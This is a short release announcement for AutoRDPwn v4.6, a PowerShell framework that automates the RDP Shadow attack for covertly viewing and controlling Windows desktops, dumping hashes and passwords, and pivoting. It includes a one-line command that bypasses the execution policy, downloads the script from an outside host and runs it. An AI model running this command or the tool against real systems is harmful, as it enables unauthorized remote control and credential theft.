AutoRDPwn v4.6 releases: The Shadow Attack Framework
AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.
Powershell 5.0 or higher
git clone https://github.com/JoelGMSec/AutoRDPwn.git
• New completely redesigned the user interface
• Improved memory execution
• Binaries are now downloaded in base64 and generated locally
• Modification of the WMI and PSRemoting ACLs in the victim
• New module available: Local Port Forwarding
• New module available: Powershell Web Server
*The rest of the changes can be consulted in the CHANGELOG file
This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.
One line execution:
powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1”
The detailed guide of use can be found at this link.
Copyright (C) 2018 JoelGMSec